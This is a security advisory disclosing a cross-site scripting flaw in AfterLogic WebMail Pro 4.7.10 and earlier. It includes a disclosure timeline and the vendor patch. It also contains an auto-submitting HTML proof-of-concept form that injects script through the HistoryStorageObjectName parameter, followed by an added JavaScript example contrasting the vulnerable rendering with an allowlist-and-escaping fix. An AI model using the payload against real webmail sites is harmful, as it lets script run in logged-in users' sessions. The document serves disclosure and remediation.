Security Advisory : Cross-Site Scripting flaw in AfterLogic WebMail Pro

Description
-------------
AfterLogic WebMail Pro is vulnerable to Cross-Site Scripting, allowing injection
of malicious code in the context of the application.

Overview
-----------
Quote from http://www.afterlogic.com/products/webmail-pro :
"Webmail front-end for your existing POP3/IMAP mail server. Offer your users
the fast AJAX webmail and innovative calendar with sharing. Stay in control
with the admin panel and the developer's API."

Details
--------
Vulnerable Product : AfterLogic WebMail Pro <= 4.7.10
Vulnerability Type : Cross-Site Scripting (XSS)
Affected page : history-storage.aspx
Vulnerable parameters : HistoryKey, HistoryStorageObjectName
Discovered by :
  Sébastien Duquette (http://intheknow-security.blogspot.com)
  Gardien Virtuel (www.gardienvirtuel.com)
Original Advisory :
  http://www.gardienvirtuel.com/fichiers/documents/publications/GVI_2009-01_EN.txt

Timeline
----------
Bug Discovered : September 18th, 2009
Vendor Advised : September 23rd, 2009
Fix made available : September 30th, 2009

Proof of concept
-------------------
The targeted user must be logged in to the webmail. This proof of concept was
successfully tested in Firefox 3.5 and Internet Explorer 8.

<html>
<head>
</head>
<body onLoad="document.form1.submit()">
<form name="form1" method="post"
action="http://WEBSITE/history-storage.aspx?param=0.21188772204998574";
onSubmit="return false;">
<input type="hidden" name="HistoryKey" value="value"/>
<input type="hidden" name="HistoryStorageObjectName" value="location;
alert('xss'); //"/>
</form>
</body>
</html>

Solution
---------
The vendor has made available a patched version. Update to AfterLogic
Webmail Pro 4.7.11.
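
The proof-of-concept value for HistoryStorageObjectName ends one statement and starts another, which suggests the parameter is written into script as bare code. The block below is an added example, not AfterLogic's code and not part of the original advisory, showing the general server-side fix for that pattern; the rendering functions, the load() call and the allowed object name are assumptions.

```javascript
// Added example. Assumption: history-storage.aspx reflects both POST
// parameters into an inline <script>; the real markup is not in the advisory.

// Value of HistoryStorageObjectName taken from the advisory's proof of concept.
const POC_VALUE = "location;\nalert('xss'); //";

// Vulnerable pattern: request values concatenated straight into script source.
function renderUnsafe(objectName, key) {
  return `<script>parent.${objectName}.load("${key}");</script>`;
}

// A value in *code* position cannot be escaped, only allowlisted.
// "HistoryStorage" is a hypothetical name standing in for the real object(s).
const ALLOWED_OBJECT_NAMES = new Set(["HistoryStorage"]);

// A value in *string* position is encoded as a JS string literal, with the
// characters that could close the <script> element or break the line escaped.
function jsString(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Hardened pattern: returns null for an unexpected object name so the caller
// can answer with an error instead of rendering anything.
function renderSafe(objectName, key) {
  if (!ALLOWED_OBJECT_NAMES.has(objectName)) {
    return null;
  }
  return `<script>parent.${objectName}.load(${jsString(key)});</script>`;
}

console.log(renderUnsafe(POC_VALUE, "value")); // payload lands in script source
console.log(renderSafe(POC_VALUE, "value"));   // rejected
console.log(renderSafe("HistoryStorage", 'x"</script>')); // key stays a string
```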